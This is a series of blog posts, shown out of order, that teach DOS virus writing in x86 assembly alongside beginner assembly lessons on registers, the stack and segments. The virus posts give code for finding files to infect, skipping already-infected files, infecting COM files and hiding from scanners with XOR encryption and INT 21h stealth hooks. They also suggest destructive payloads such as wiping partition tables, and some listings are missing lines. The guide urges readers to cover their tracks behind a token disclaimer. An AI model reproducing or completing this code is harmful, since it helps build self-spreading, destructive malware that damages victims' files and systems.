Checking and Criteria of Infection

Sorry for not updating here lately but now I will continue what I promised for.

Your virus should be judicious in its infection. For example, you might not want to infect COMMAND.COM, since some programs (i.e. the puny FluShot+) check its CRC or checksum on runtime. Perhaps you do not wish to infect the first valid file in the directory. Ambulance Car is an example of such a virus. Regardless, if there is some infection criteria, you should check for it now. Here's example code checking if the last two letters are 'ND', a simple check for COMMAND.COM:

cmp word ptr [bp+offset DTA+35], 'DN' ; Reverse word order
jz fail_check

Every virus has certain characteristics with which you can identify whether
a file is infected already. For example, a certain piece of code may
always occur in a predictable place. Or perhaps the JMP instruction is
always coded in the same manner. Regardless, you should make sure your
virus has a marker so that multiple infections of the same file do not
occur. Here's an example of one such check (for a COM file infector):

mov ah,3Fh ; Read first three
mov cx, 3 ; bytes of the file
lea dx, [bp+offset buffer] ; to the buffer
int 21h

mov ax, 4202h ; SEEK from EOF
xor cx, cx ; DX:CX = offset
xor dx, dx ; Returns filesize
int 21h ; in DX:AX

sub ax, virus_size + 3
cmp word ptr [bp+offset buffer+1], ax
jnz infect_it

mov ah, 3Eh ; else close the file
int 21h ; and go find another

In this example, BX is assumed to hold a file handle to the program to be
checked for infection and virus_size equals the size of the virus. Buffer
is assumed to be a three-byte area of empty space. This code fragment
reads the first three bytes into buffer and then compares the JMP location
(located in the word beginning at buffer+1) to the filesize If the JMP
points to virus_size bytes before the EOF, then the file is already
infected with this virus. Another method would be to search at a certain
location in the file for a marker byte or word. For example:

mov ah, 3Fh ; Read the first four
mov cx, 4 ; bytes of the file into
lea dx, [bp+offset buffer] ; the buffer.
int 21h

cmp byte ptr [buffer+3], infection_id_byte ; Check the fourth
jz bomb_out ; byte for the marker

Here you should create your own malicious code to infect the checked file. Stay tune here cause I'll post some example of code to infect a file in the next post.


Ok now I will continue my last post on the replicator part.

Before you can infect a file, you have to find it first! This can be a bottleneck in the performance of the virus, so it should be done as efficiently as possible. For runtime virii, there are a few possibilities. You could infect files in only the current directory, or you could write a directory traversal function to infect files in ALL directories (only a few files per run, of course), or you could infect files in only a few select directories. Why would you choose to only infect files in the current directory? It would appear to limit the efficacy of the infections.
However, this is done in some virii either to speed up the virus or to shorten the code size.

Here is a directory traversal function. It uses recursion, so it is rather slow, but it does the job. This was excerpted with some modifications from The Funky Bob Ross Virus [Beta].

traverse_fcn proc near
push bp ; Create stack frame
mov bp,sp
sub sp,44 ; Allocate space for DTA

call infect_directory ; Go to search & destroy routines

mov ah,1Ah ;Set DTA
lea dx,word ptr [bp-44] ; to space allotted
int 21h ;Do it now!

mov ah, 4Eh ;Find first
mov cx,16 ;Directory mask
lea dx,[si+offset dir_mask] ; *.*
int 21h
jmp short isdirok
cmp byte ptr [bp-14], '.' ; Is first char == '.'?
je short donext ; If so, loop again
lea dx,word ptr [bp-14] ; else load dirname
mov ah,3Bh ; and changedir there
int 21h
jc short donext ; Do next if invalid
inc word ptr [si+offset nest] ; nest++
call near ptr traverse_fcn ; recurse directory
lea dx,word ptr [bp-44] ; Load space allocated for DTA
mov ah,1Ah ; and set DTA to this new area
int 21h ; 'cause it might have changed

mov ah,4Fh ;Find next
int 21h
jnc gonow ; If OK, jmp elsewhere
cmp word ptr [si+offset nest], 0 ; If root directory
; (nest == 0)
jle short cleanup ; then Quit
dec word ptr [si+offset nest] ; Else decrement nest
lea dx, [si+offset back_dir]; '..'
mov ah,3Bh ; Change directory
int 21h ; to previous one
mov sp,bp
pop bp
traverse_fcn endp

; Variables
nest dw 0
back_dir db '..',0
dir_mask db '*.*',0

The code is self-explanatory. Make sure you have a function called infect_directory which scans the directory for possible files to infect and makes sure it doesn't infect already-infected files. This function, in turn, calls infect_file which infects the file.

Note, as I said before, this is slow. A quicker method, albeit not as global, is the "dot dot" method. Hellraiser showed me this neat little trick. Basically, you keep searching each directory and, if you haven't infected enough, go to the previous directory (dot dot) and try again, and so on. The code is simple.

call infect_directory
lea dx, [bp+dotdot]
mov ah, 3bh ; CHDIR
int 21h
jnc dir_loopy ; Carry set if in root

; Variables
dotdot db '..',0

Now you must find a file to infect. This is done (in the fragments above) by a function called infect_directory. This function calls FINDFIRST and FINDNEXT a couple of times to find files to infect. You should first set up a new DTA. NEVER use the DTA in the PSP (at 80h) because altering that will affect the command-line parameters of the infected program when control is returned to it. This is easily done with the following:

mov ah, 1Ah ; Set DTA
lea dx, [bp+offset DTA] ; to variable called DTA (wow!)
int 21h

Where DTA is a 42-byte chunk of memory. Next, issue a series of FINDFIRST and FINDNEXT calls:

mov ah, 4Eh ; Find first file
mov cx, 0007h ; Any file attribute
lea dx, [bp+offset file_mask]; DS:[DX] --> filemask
int 21h
jc none_found
call check_infection
mov ah, 4Fh ; Find next file
int 21h
jnc found_another

Where file_mask is DBed to either '*.EXE',0 or '*.COM',0. Alternatively, you could FINDFIRST for '*.*',0 and check if the extension is EXE or COM.

In my next post I will explain about the criteria of the infections.

Installment II: The Replicator

In the last installment of my Virus Writing Guide, I explained the various parts of a virus and went into a brief discussion about each. In this issue, I shall devote all my attention towards the replicator portion of the virus. I promised code and code I shall present.

However, I shall digress for a moment because it has come to my attention that some mutant copies of the first installment were inadvertently released. These copies did not contain a vital section concerning the calculation of offsets.

You never know where your variables and code are going to wind up in memory. If you think a bit, this should be pretty obvious. Since you are attaching the virus to the end of a program, the location in memory is going to be changed, i.e. it will be larger by the size of the infected program. So, to compensate, we must take the change in offset from the original virus, or the delta offset, and add that to all references to variables.

Instructions that use displacement, i.e. relative offsets, need not be changed. These instructions are the JA, JB, JZ class of instructions, JMP SHORT, JMP label, and CALL. Thus, whenever possible use these in favor of, say, JMP FAR PTR.

Suppose in the following examples, si is somehow loaded with the delta offset.

mov ax, counter
mov ax, word ptr [si+offset counter]

mov dx, offset message
lea dx, [si+offset message]

You may be asking, "how the farg am I supposed to find the delta offset!?"
It is simple enough:

call setup
pop si
sub si, offset setup

An explanation of the above fragment is in order. CALL setup pushes the location of the next instruction, i.e. offset setup, onto the stack. Next, this location is POPed into si. Finally, the ORIGINAL offset of setup (calculated at compile-time) is subtracted from si, giving you the delta offset. In the original virus, the delta offset will be 0, i.e. the new location of setup equals the old location of setup.

It is often preferable to use bp as your delta offset, since si is used in string instructions. Use whichever you like. I'll randomly switch between the two as suits my mood.

Now back to the other stuff...

A biological virus is a parasitic "organism" which uses its host to spread itself. It must keep the host alive to keep itself "alive." Only when it has spread everywhere will the host die a painful, horrible death. The modern electronic virus is no different. It attaches itself to a host system and reproduces until the entire system is fucked. It then proceeds and neatly wrecks the system of the dimwit who caught the virus.

Replication is what distinguishes a virus from a simple trojan. Anybody can write a trojan, but a virus is much more elegant. It acts almost invisibly, and catches the victim off-guard when it finally surfaces. The first question is, of course, how does a virus spread? Both COM and EXE infections (along with sample infection routines) shall be presented.

There are two major approaches to virii: runtime and TSR. Runtime virii infect, yup, you guessed it, when the infected program is run, while TSR virii go resident when the infected programs are run and hook the interrupts and infect when a file is run, open, closed, and/or upon termination (i.e. INT 20h, INT 21h/41h). There are advantages and disadvantages to each. Runtime virii are harder to detect as they don't show up on memory maps, but, on the other hand, the delay while it searches for and infects a file may give it away. TSR virii, if not properly done, can be easily spotted by utilities such as MAPMEM, PMAP, etc, but are, in general, smaller since they don't need a function to search for files to infect. They are also faster than runtime virii, also because they don't have to search for files to infect. I shall cover runtime virii here, and TSR virii in a later installment.

Here is a summary of the infection procedure:
1) Find a file to infect.
2) Check if it meets the infection criteria.
3) See if it is already infected and if so, go back to 1.
4) Otherwise, infect the file.
5) Cover your tracks.

I shall go through each of these steps and present sample code for each. Note that although a complete virus can be built from the information below, you cannot merely rip the code out and stick it together, as the fragments are from various different virii that I have written. You must be somewhat familiar with assembly. I present code fragments; it is up to you to either use them as examples or modify them for your own virii.

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Concealer and the BOMB!

This is the part which conceals the program from notice by the everyday user and virus scanner. The simplest form of concealment is the encryptor. The code for a simple XOR encryption system follows:

encrypt_val db ?

mov ah, encrypt_val

mov cx, part_to_encrypt_end - part_to_encrypt_start
mov si, part_to_encrypt_start
mov di, si
lodsb ; DS:[SI] -> AL
xor al, ah
stosb ; AL -> ES:[DI]
loop xor_loop

Note the encryption and decryption procedures are the same. This is due to the weird nature of XOR. You can CALL these procedures from anywhere in the program, but make sure you do not call it from a place within the area
to be encrypted, as the program will crash. When writing the virus, set the encryption value to 0. part_to_encrypt_start and part_to_encrypt_end sandwich the area you wish to encrypt. Use a CALL decrypt in the beginning of V2 to unencrypt the file so your program can run. When infecting a file, first change the encrypt_val, then CALL encrypt, then write V2 to the end of the file, and CALL decrypt. MAKE SURE THIS PART DOES NOT LIE IN THE AREA TO BE ENCRYPTED!!!

This is how V2 would look with the concealer:





Alternatively, you could move parts of the unencrypted stuff between Part_To_Encrypt_End and V2_End.

The value of encryption is readily apparent. Encryption makes it harder for virus scanners to locate your virus. It also hides some text strings located in your program. It is the easiest and shortest way to hide your

Encryption is only one form of concealment. At least one other virus hooks into the DOS interrupts and alters the output of DIR so the file sizes appear normal. Another concealment scheme (for TSR virii) alters DOS so
memory utilities do not detect the virus. Loading the virus in certain parts of memory allow it to survive warm reboots. There are many stealth techniques, limited only by the virus writer's imagination.

So now all the boring stuff is over. The nastiness is contained here. The bomb part of the virus does all the deletion/slowdown/etc which make virii so annoying. Set some activation conditions of the virus. This can be
anything, ranging from when it's your birthday to when the virus has infected 100 files. When these conditions are met, then your virus does the good stuff. Some suggestions of possible bombs:

1) System slowdown - easily handled by trapping an interrupt and causing a delay when it activates.
2) File deletion - Delete all ZIP files on the drive.
3) Message display - Display a nice message saying something to the effect of "You are fucked."
4) Killing/Replacing the Partition Table/Boot Sector/FAT of the hard drive - This is very nasty, as most dimwits cannot fix this.

This is, of course, the fun part of writing a virus, so be original!

The Replicator

The job of the replicator is to spread the virus throughout the system of the clod who has caught the virus. How does it do this without destroying the file it infects? The easiest type of replicator infects COM files. It first saves the first few bytes of the infected file. It then copies a small portion of its code to the beginning of the file, and the rest to the end.

In the diagram, P1 is part 1 of the file, P2 is part 2 of the file, and V1 and V2 are parts 1 and 2 of the virus. Note that the size of P1 should be the same as the size of V1, but the size of P2 doesn't necessarily have to be the same size as V2. The virus first saves P1 and copies it to the
either 1) the end of the file or 2) inside the code of the virus. Let's assume it copies the code to the end of the file. The file now looks like:

Then, the virus copies the first part of itself to the beginning of the file.

Finally, the virus copies the second part of itself to the end of the file. The final, infected file looks like this:

The question is: What the fuck do V1 and V2 do? V1 transfers control of the program to V2. The code to do this is simple.

JMP FAR PTR Duh ; Takes four bytes
Duh DW V2_Start ; Takes two bytes

Duh is a far pointer (Segment:Offset) pointing to the first instruction of V2. Note that the value of Duh must be changed to reflect the length of the file that is infected. For example, if the original size of the program is 79 bytes, Duh must be changed so that the instruction at
CS:[155h] is executed. The value of Duh is obtained by adding the length of V1, the original size of the infected file, and 256 (to account for the PSP). In this case, V1 = 6 and P1 + P2 = 79, so 6 + 79 + 256 = 341 decimal (155 hex).

An alternate, albeit more difficult to understand, method follows:

DB 1101001b ; Code for JMP (2 byte-displacement)
Duh DW V2_Start - OFFSET Duh ; 2 byte displacement

This inserts the jump offset directly into the code following the jump instruction. You could also replace the second line with

DW V2_Start - $

which accomplishes the same task.

V2 contains the rest of the code, i.e. the stuff that does everything else. The last part of V2 copies P1 over V1 (in memory, not on disk) and then transfers control to the beginning of the file (in memory). The original program will then run happily as if nothing happened. The code to do this is also very simple.

MOV SI, V2_START ; V2_START is a LABEL marking where V2 starts
SUB SI, V1_LENGTH ; Go back to where P1 is stored
MOV DI, 0100h ; All COM files are loaded @ CS:[100h] in memory
MOV CX, V1_LENGTH ; Move CX bytes

MOV DI, 0100h

This code assumes that P1 is located just before V2, as in:


It also assumes ES equals CS. If these assumptions are false, change the code accordingly. Here is an example:

PUSH CS ; Store CS
POP ES ; and move it to ES
; Note MOV ES, CS is not a valid instruction
MOV SI, P1_START ; Move from whereever P1 is stored
MOV DI, 0100h ; to CS:[100h]

MOV DI, 0100h

This code first moves CS into ES and then sets the source pointer of MOVSB to where P1 is located. Remember that this is all taking place in memory, so you need the OFFSET of P1, not just the physical location in the file. The offset of P1 is 100h higher than the physical file location, as COM files are loaded starting from CS:[100h].

So here's a summary of the parts of the virus and location labels:

Duh DW V2_Start


; First part of the program stored here for future use

; Real Stuff

V1_Length EQU V1_End - V1_Start

Alternatively, you could store P1 in V2 as follows:




That's all there is to infecting a COM file without destroying it! Simple, no? EXE files, however, are a little tougher to infect without rendering them inexecutable - I will cover this topic in a later file.

Now let us turn our attention back to the replicator portion of the virus. The steps are outlined below:

1) Find a file to infect
2) Check if it is already infected
3) If so, go back to 1
4) Infect it
5) If infected enough, quit
6) Otherwise, go back to 1

Finding a file to infect is a simple matter of writing a directory traversal procedure and issuing FINDFIRST and FINDNEXT calls to find possible files to infect. Once you find the file, open it and read the first few bytes. If they are the same as the first few bytes of V1, then
the file is already infected. If the first bytes of V1 are not unique to your virus, change it so that they are. It is *extremely* important that your virus doesn't reinfect the same files, since that was how Jerusalem was first detected. If the file wasn't already infected, then infect it!
Infection should take the following steps:

1) Change the file attributes to nothing.
2) Save the file date/time stamps.
3) Close the file.
4) Open it again in read/write mode.
5) Save P1 and append it to the end of the file.
6) Copy V1 to the beginning, but change the offset which it JMPs to so
it transfers control correctly. See the previous part on infection.
7) Append V2 to the end of the file.
8) Restore file attributes/date/time.

You should keep a counter of the number of files infected during this run. If the number exceeds, say three, then stop. It is better to infect slowly then to give yourself away by infecting the entire drive at once.

You must be sure to cover your tracks when you infect a file. Save the file's original date/time/attributes and restore them when you are finished. THIS IS VERY IMPORTANT! It takes about 50 to 75 bytes of code, probably less, to do these few simple things which can do wonders for the concealment of your program.

Going Through the Virus

Now I must said that you have finish studying about the basics of the assembly language, so that I want to continue with our virus writing guide. Before that you must know every types and function of virus you want to create. Remember, all of this is for educational purpose only. I don't want to take any responsibility of what you're doing with my article. For started, there are three types of virii @ virus that is:

1) Tiny virii (under 500 bytes) which are designed to be undetectable due to their small size. TINY is one such virus. They are generally very simple because their code length is so limited.

2) Large virii (over 1,500 bytes) which are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'Stealth' virus in existence.

3) Other virii which are not designed to be hidden at all (the writers don't give a shit). The common virus is like this. All overwriting virii are in this category.

Tiny virii generally do not have many of the "features" of larger virii, such as directory traversal. The third type is more of a replicating trojan-type, and will warrant a brief (very, very brief!) discussion later.

A virus may be divided into three parts: the replicator, the concealer, and the bomb. The replicator part controls the spread of the virus to other files, the concealer keeps the virus from being detected, and the bomb only executes when the activation conditions of the virus (more on that later) are satisfied.

On the next post I will explain briefly to you about the replicator part of the virus and I will provide some of the code. Don't misuse this information! See you again in the next post.

Function of INT

Ok, as promised before, I'll explain about the INT in this post. So, check it out and understand it cause this will be used a lot in your programme you write.

INT 21h ;calls DOS standard interrupt # 21h
INT 10h ;the Video BIOS interrupt..

INT is used to call a subroutine that performs some function that you'd rather not write yourself. For instance, you would use a DOS interrupt to OPEN a file. You would similiarly use the Video BIOS interrupt to set the screen mode, move the cursor, or to do any other function that would be difficult to program.

Which subroutine the interrupt preforms is USUALLY specified by AH. For instance, if you wanted to print a message to the screen you'd use INT 21h, subfunction 9 by doing this:

mov ah,9
int 21h

Yes, it's that easy. Of course, for that function to do anything, you need to specify WHAT to print. That function requires that you have DS:DX be a FAR pointer that points to the string to display. This string must terminate with a dollar sign. Here's an example:

MyMessage db "This is a message!$"
mov dx,OFFSET MyMessage
mov ax,SEG MyMessage
mov ds,ax
mov ah,9
int 21h

The DB, like the DW (and DD) merely declares the type of a piece of data.

DB => Declare Byte (I think of it as 'Data Byte')
DW => Declare Word
DD => Declare Dword

Also, you may have noticed that I first put the segment value into AX and then put it into DS. I did that because the 80x86 does NOT allow you to put an immediate value into a segment register. You can, however, pop stuff into a Segment register or mov an indexed value into the segment register. A few examples:

mov ax,SEG MyMessage
mov ds,ax

push SEG Message
pop ds

mov ds,[SegOfMyMessage]
;where [SegOfMyMessage] has already been loaded with
; the SEGMENT that MyMessage resides in

mov ds,10
mov ds,SEG MyMessage

Well, that's about it for what you need to know to get started...

And here I also want you to understand how to use the goodies I give you in the last post that is Turbo Assembler. Here some example:


DOSSEG ;This arranges the segments in order according DOS standards
.MODEL SMALL ;dont worry about this yet
.STACK 200h ;tells the compiler to put in a 200h byte stack
.CODE ;starts code segment


START: ;generally a good name to use as an entry point

mov ax,4c00h
int 21h


;===========- By the way, a semicolon means the start of a comment.

If you were to enter this program and TASM & TLINK it, it would execute perfectly. It will do absolutly nothing, but it will do it well.

What it does:
Upon execution, it will jump to START. move 4c00h into AX, and call the DOS interrupt, which exits back to DOS.

That's nice, eh? If you've understood the majority of what was presented in the post before this, you are ready to start programming!

Free Assembly Compilers to You!

Now I want to share with you a stand alone software used to compile .asm files to exe files. This is very useful for you to assemble whats you write/programmed. Check it out!


Understanding the STACK

Heck, as long as I've mentioned it before, lets look at the STACK:

The STACK is an area of memory that has the properties of a STACK of plates- the last one you put on is the first one take off. The only difference is that the stack of plates is on the roof. (Ok, so that can't really happen... unless gravity was shut down...) Meaning that as you put another plate (or piece of data) on the stack, the STACK grows DOWNWARD. Meaning that the stack pointer is DECREASED after each PUSH, and INCREASED after each POP.

_____ Top of the allocated memory in the stack segment (SS)
þ ® SP (the stack pointer points to the most recently pushed byte)

Truthfully, you don't need to know much more than a stack is Last In, First Out (LIFO).

push cx ;this swaps the contents of CX and AX
push ax ;of course, if you wanted to do this quicker, you'd
pop cx ;just say XCHG cx,ax
pop ax ; but thats not my point.

push cx ;this correctly restores AX & CX
push ax
pop ax
pop cx

Now I'll do a quick run through on the assembler instructions that you MUST know:

Examples of different addressing modes:

MOV ax,5 ;moves and IMMEDIATE value into ax (think 'AX = 5')
MOV bx,cx ;moves a register into another register
MOV cx,[SI] ;moves [DS:SI] into cx (the Default Segment is Used)
MOV [DI+5],ax ;moves ax into [DS:DI+5]
MOV [ES:DI+BX+34],al ;same as above, but has a more complicated
MOV ax,[546] ;moves whats at [DS:546] into AX

Note that the last example would be totally different if the brackets were left out. It would mean that an IMMEDIATE value of 546 is put into AX, instead of what's at offset 546 in the Default Segment.

Whenever you see brackets [] around something, it means that it refers to what is AT that offset. For instance, say you had this situation:

MyData dw 55
mov ax,MyData

What is that supposed to mean? Is MyData an Immediate Value? This is confusing and for our purposes WRONG. The 'Correct' way to do this would be:

MyData dw 55
mov ax,[MyData]

This is clearly moving what is AT the address of MyData, which would be 55, and not moving the OFFSET of MyData itself. But what if you actually wanted the OFFSET? Well, you must specify directly.

MyData dw 55
mov ax,OFFSET MyData

Similiarly, if you wanted the SEGMENT that MyData was in, you'd do this:

MyData dw 55
mov ax,SEG MyData

See?I think you will get it after all this brief post. :-)
As for he next post I will describe about the INT. Wait and see.

The Registers (Continued)

As before I've mentioned about the AX registers, now we'll continue about the other registers. Take note guys!.

BX (BH/BL): same as AX (BH/BL)

As mentioned before, BX can be used as an OFFSET register.
mov ax,[ds:bx] (grabs the WORD at the address created by
DS and BX)

CX (CH/CL): Same as AX

Used in REP prefix to repeat an instruction CX number of times
mov cx,10
mov ax,0
rep stosb ;this would write 10 zeros to [ES:DI] and increase
;DI by 10.
Used in LOOP
mov cx,100


;do something that would print out 'HI'

loop THELABEL ;this would print out 'HI' 100 times
;the loop is the same as:
dec cx

DX (DH/DL): Same as above
USED in word sized MUL, DIV, IMUL, IDIV as DEST for high word
or remainder

mov bx,10
mov ax,5
mul bx ;this multiplies BX by AX and puts the result
;in DX:AX

(continue from above)
div bx ;this divides DX:AX by BX and put the result in AX and
;the remainder (in this case zero) in DX

Used as address holder for IN's, and OUT's (see ax's examples)


DI: Used as destination address holder for stos, movs (see ax's examples)
Also can be used as an OFFSET register

SI: Used as source address holder for lods, movs (see ax's examples)
Also can be used as OFFSET register

Example of MOVS:

movsb ;moves whats at [DS:SI] into [ES:DI] and increases
movsw ; DI and SI by one for movsb and 2 for movsw

NOTE: Up to here we have assumed that the DIRECTION flag was cleared.
If the direction flag was set, the DI & SI would be DECREASED
instead of INCREASED.
cld ;clears direction flag
std ;sets direction flag


BP: Base Pointer. Can be used to access the stack. Default segment is
SS. Can be used to access data in other segments throught the use

mov al,[ES:BP] ;moves a byte from segment ES, offset BP
Segment overrides are used to specify WHICH of the 4 (or 6 on the
386) segment registers to use.

SP: Stack Pointer. Does just that. Segment overrides don't work on this
guy. Points to the current position in the stack. Don't alter unless
you REALLY know what you are doing.


DS: Data segment- all data read are from the segment pointed to be this
segment register unless a segment overide is used.
Used as source segment for movs, lods
This segment also can be thought of as the "Default Segment" because
if no segment override is present, DS is assumed to be the segmnet
you want to grab the data from.

ES: Extra Segment- this segment is used as the destination segment
for movs, stos
Can be used as just another segment... You need to specify [ES:°°]
to use this segment.

FS: (386+) No particular reason for it's name... I mean, we have CS, DS,
and ES, why not make the next one FS? :) Just another segment..

GS: (386+) Same as FS


CS: Segment that points to the next instruction- can't change directly
IP: Offset pointer to the next instruction- can't even access
The only was to change CS or IP would be through a JMP, CALL, or RET

SS: Stack segment- don't mess with it unless you know what you're
doing. Changing this will probably crash the computer. This is the
segment that the STACK resides in.

So, that's all for now and I'll come back with some example of the stack and the WRONG and RIGHT doing in the stack. Have fun y'all!

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The Registers (AX)

I've mentioned AX, AL, and AH before, and you're probably wondering what exactly they are. Well, I'm gonna go through one by one and explain what each register is and what it's most common uses are. Here goes:


AX is a 16 bit register which, as metioned before, is merely two bytes attached together. Well, for AX, BX, CX, & DX you can independantly access each part of the 16 bit register through the 8bit (or byte sized) registers. For AX, they are AL and AH, which are the Low and High parts of AX, respectivly. It should be noted that any change to AL or AH, will change AX. Similairly any changes to AX may or may not change AL and AH. For instance:

Let's suppose that AX = 00000h (AH and AL both = 0, too)

mov AX,0
mov AL,0
mov AH,0

Now we set AL = 0FFh.

mov AL,0FFh

:AX => 000FFh ;I'm just showing ya what's in the registers
:AL => 0FFh
:AH => 000h

Now we increase AX by one:


:AX => 00100h (= 256.. 255+1= 256)
:AL => 000h (Notice that the change to AX changed AL and AH)
:AH => 001h

Now we set AH = 0ABh (=171)

mov AH,0ABh

:AX => 0AB00h
:AL => 000h
:AH => 0ABh

Notice that the first example was just redundant...
We could've set AX = 0 by just doing

mov ax,0

:AX => 00000h
:AL => 000h
:AH => 000h

I think ya got the idea...

Used as the destination of an IN (in port)

Source for the output for an OUT

Destination for LODS (grabs byte/word from [DS:SI] and INCreses SI)
lodsb (same as: mov al,[ds:si] ; inc si )
lodsw (same as: mov ax,[ds:si] ; inc si ; inc si )

Source for STOS (puts AX/AL into [ES:DI] and INCreses DI)
stosb (same as: mov [es:di],al ; inc di )
stosw (same as: mov [es:di],ax ; inc di ; inc di )


As the next post I will get to you about the registers called BX. That's all for this post. You have to get it! :-)

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Segments and Offsets

Pay close attention, because this topic is (I believe) the single most difficult (or annoying, once you understand it) aspect of ASSEMBLER.

An OverView:

The original designers of the 8088, way back when dinasaurs ruled the planet, decided that no one would ever possibly need more than one MEG (short for MEGABYTE :) of memory. So they built the machine so that it couldn't access above 1 MEG. To access the whole MEG, 20 BITs are needed. Problem was that the registers only had 16 bits, and if the used two registers, that would be 32 bits, which was way too much (they thought.) So they came up with a rather brilliant (blah) way to do their addressing- they would use two registers. They decided that they would not be 32bits, but the two registers would create 20 bit addressing. And thus Segments and OFFsets were born. And now the confusing specifics.

SEGMENT = OFFSET /16 ;note that the lower 4 bits are lost

SEGMENT * 16 |0010010000010000----| range (0 to 65535) * 16
OFFSET |----0100100000100010| range (0 to 65535)
20 bit address |00101000100100100010| range 0 to 1048575 (1 MEG)

This shows how DS:SI is used to construct a 20 bit address.

Segment registers are: CS, DS, ES, SS. On the 386+ there are also FS & GS

Offset registers are: BX, DI, SI, BP, SP, IP. In 386+ protected mode, ANY general register (not a segment register) can be used as an Offset register. (Except IP, which you can't access.)

CS:IP => Points to the currently executing code.
SS:SP => Points to the current stack position.

If you'll notice, the value in the SEGMENT register is multiplied by 16 (or shifted left 4 bits) and then added to the OFFSET register. Together they create a 20 bit address. Also Note that there are MANY combinations of the SEGMENT and OFFSET registers that will produce the same address. The standard notation for a SEGment/OFFset pair is:

SEGMENT:OFFSET or A000:0000 ( which is, of course in HEX )

Where SEGMENT = 0A000h and OFFSET = 00000h. (This happens to be the
address of the upper left pixel on a 320x200x256 screen.)

You may be wondering what would happen if you were to have a segment value of 0FFFFh and an offset value of 0FFFFh.

Take notice: 0FFFFh * 16 (or 0FFFF0h ) + 0FFFFh = 1,114,095, which is
definately larger than 1 MEG (which is 1,048,576.)

This means that you can actually access MORE than 1 meg of memory! Well, to actually use that extra bit of memory, you would have to enable something called the A20 line, which just enables the 21st bit for addressing. This little extra bit of memory is usually called "HIGH MEMORY" and is used when you load something into high memory or say DOS = HIGH in your AUTOEXEC.BAT file. (HIMEM.SYS actually puts it up there..) You don't need to know that last bit, but hey, knowledge is good, right?

Now, I think it's over here and I'm exposing to you about the "REGISTERS" in the next post. See ya!

Assembly Tutorial (Continued)

As before we know the basic such as byte, nibble and bit. Today i'll tell you more about this basics.

1 WORD |0000000000000000|
16 BITs

The WORD is just two BYTEs that are stuck together. A word has a maximum value of 0FFFFh (= 65,535). Since a WORD is 4 NIBBLEs, it is represented by 4 HEX digits. This is the size of the 16bit registers on the 80x86 chips. The registers are: AX, BX, CX, DX, DI, SI, BP, SP, CS, DS, ES, SS, and IP. Note that you cannot directly change the contents of IP or CS in any way. They can only be changed by JMP, CALL, or RET.

2 WORDs |00000000000000000000000000000000|

A DWORD (or "DOUBLE WORD") is just two WORDs, hence the name DOUBLE-WORD. This can have a maximum value of 0FFFFFFFFh (8 NIBBLEs, 8 'F's) which equals 4,294,967,295. Damn large. This is also the size or the 386's 32bit registers: EAX, EBX, ECX, EDX, EDI, ESI, EBP, ESP, EIP. The 'E ' denotes that they are EXTENDED registers. The lower 16bits is where the normal 16bit register of the same name is located.

1 KILOBYTE |-lots of zeros (8192 of 'em)-|
256 DWORDs
512 WORDs
1024 BYTEs
2048 NIBBLEs
8192 BITs

We've all heard the term KILOBYTE byte, before, so I'll just point out that a KILOBYTE, despite its name, is -NOT- 1000 BYTEs. It is actually 1024 bytes.

1 MEGABYTE |-even more zeros (8,388,608 of 'em)-|
262,144 DWORDs
524,288 WORDs
1,048,576 BYTEs
2,097,152 NIBBLEs
8,388,608 BITs

Just like the KILOBYTE, the MEGABYTE is -NOT- 1 million bytes. It is actually 1024*1024 BYTEs, or 1,048,578 BYTEs

we will investigate an annoying little aspect of the 80x86 processors in later post. I'm talking about nothing other than SEGMENTS & OFFSETS!

Assembly Tutorial (As Requested)

Now i'm trying to get you know better about assembly language as requested by our friends. (frndskiller & team)

First thing ya need to know is a little jargon so you can talk about the basic data structures with your friends and neighbors. They are (in order of increasing size) BIT, NIBBLE, BYTE, WORD, DWORD, FWORD, PWORD and QWORD, PARA, KiloByte, MegaByte. The ones that you'll need to memorize are BYTE, WORD, DWORD, KiloByte, and MegaByte. The others aren't used all that
much, and you wont need to know them to get started. Here's a little graphical representation of a few of those data structures:

(The zeros in between the || is a graphical representation of the number of bits in that data structure.)

1 BIT : |0|

The simplest piece of data that exists. Its either a 1 or a zero.
Put a string of them together and you have a BASE-2 number system.
Meaning that instead of each 'decimal' place being worth 10, its only
worth 2. For instance: 00000001 = 1; 00000010 = 2; 00000011 = 3, etc..

1 NIBBLE: |0000|
4 BITs

The NIBBLE is half a BYTE or four BITS. Note that it has a maximum value
of 15 (1111 = 15). Not by coincidence, HEXADECIMAL, a base 16 number
system (computers are based on this number system) also has a maximum
value of 15, which is represented by the letter 'F'. The 'digits' in
HEXADECIMAL are (in increasing order):


The standard notation for HEXADECIMAL is a zero followed by the number
in HEX followed by a lowercase "h" For instance: "0FFh" = 255 DECIMAL.

1 BYTE |00000000|
8 BITs

The BYTE is the standard chunk of information. If you asked how much
memory a machine had, you'd get a response stating the number of BYTEs it
had. (Usually preceded by a 'Mega' prefix). The BYTE is 8 BITs or
2 NIBBLEs. A BYTE has a maximum value of 0FFh (= 255 DECIMAL). Notice
that because a BYTE is just 2 NIBBLES, the HEXADECIMAL representation is
simply two HEX digits in a row (ie. 013h, 020h, 0AEh, etc..)

The BYTE is also that size of the 'BYTE sized' registers - AL, AH, BL, BH,

That's all for today :-).

Stealth Viruses Method 2

Some May notice that when they use PCTOOLs (aka PCSHELL) or Peter Norton Utilities, or *SOME* File Managing systems like DOS-Shell, the File increase of infected files is know visable. There is no doubt about it, if you only put Method #1 in your virus you will encounter times were the file increase shows. Its not because your Routine isn't good! But due to the fact that there is another way to Read the Dir Listing by DOS. An this method is Call File-find by ASCIIZ format.

We just learned how to edit File-Find by FCB. Which is used by MS-DOS PC-DOS and some other programs. But unlike the others, they use the ASCIIZ file-Find method as it is EASIER to open, close, edite, and any other file access routine is ALOT easier with the ASCIIZ or (File Handle) system. So we will make our Virus Stealth to Method #2! Making us 100% Stealth from file-finds...

The Function we have to Intecept is Interrupt 21h, with Functions AH=4Eh (Find First Matching File) and AH=4F (Find Next Matching File) The Way to go about it is Very much ALIKE to the first one, so just understand the thoery, and you'll be able to program it within seconds.

When this function is called, it will fill the current DTA with 12 entries totally 43 bytes. The DTA will be set up as follows: (below)
BTW: DTA is only a place DOS uses to do Disk Transfer Areas! It ISN'T
like the FCB, or PSP that is anyways the same! You can play with
this as you wish. You also use this DTA to read the Command Line

Offset Size Description
00h ³ 1 ³ Drive Letter
01h ³ 11 ³ Seach Template
0Ch ³ 1 ³ Attribute Search
0Dh ³ 2 ³ Entry count within Directory
0Fh ³ 2 ³ Cluster Number of start of parent directory
11h ³ 4 ³ Reserved (Atleast Undocumented)
15h ³ 1 ³ Attribute of File FOUND
